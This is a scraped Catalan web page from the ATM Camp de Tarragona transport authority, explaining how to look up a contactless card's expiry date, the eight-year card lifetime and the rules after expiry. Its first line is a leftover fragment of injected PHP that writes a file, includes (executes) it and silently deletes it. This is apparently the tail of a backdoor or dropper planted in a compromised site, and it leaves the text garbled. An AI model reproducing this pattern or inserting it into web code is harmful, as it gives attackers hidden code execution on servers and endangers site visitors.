");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Caducitat de la targeta
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021


Consulta de la data de caducitat de les targetes de transport

Per obtenir la data de caducitat, només cal introduir en aquesta eina de consulta el número d’identificació de 12 dígits situat a la part inferior esquerra del revers de la targeta.

Exemples de targetes en formats de 10 i 12 xifres

Introdueixi aquí tots els dígits del número de xip i premi el botó:

Carregant...
Carregant...

El Sistema Tarifari Integrat (STI) del Camp de Tarragona té establert que les targetes sense contacte que es fan servir per carregar els títols de transport de l’ATM tinguin una vida útil màxima de 8 anys a comptar des de la seva primera activació. Tècnicament, es considera que durant aquest període el xip sense contacte de la targeta pot funcionar sense problemes. Cal tenir present, però, que les targetes associades a determinats perfils d’usuari (T-12, famílies nombroses o monoparentals i aturats) tenen una caducitat vinculada a la validesa del perfil, és a dir, fins que s’extingeixen els requisits per tenir-les, en lloc dels 8 anys habituals.

Atès que el STI de l’ATM del Camp de Tarragona va entrar en funcionament a l’octubre de 2008, a partir de 2016 comencen a caducar les primeres targetes emeses que encara estiguin en circulació.

Actualment, el reglament d’ús de les targetes de l’ATM estableix que, un cop caducades, no es pugui fer cap mena d’operació, ja sigui de recàrrega de nous títols o de validació dels ja carregats.

Per tal d’evitar aquest perjudici al client, l’ATM ha volgut millorar-ne les prestacions, de manera que, un cop caducades, continuaran essent acceptades pels sistema de validació fins a exhaurir el saldo de viatges o el límit temporal dels títols de transport que continguin. Durant aquest període, no es podran carregar nous títols de transport, per la qual cosa l’usuari haurà d’adquirir una nova targeta sense contacte en qualsevol dels punts de la xarxa de venda.

La data de caducitat es pot consultar als Centres d’Atenció al Client (www.atmcamptarragona.cat/localitzacio) i en determinats punts de la xarxa de venda (www.atmcamptarragona.cat/xarxa-recarrega).

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona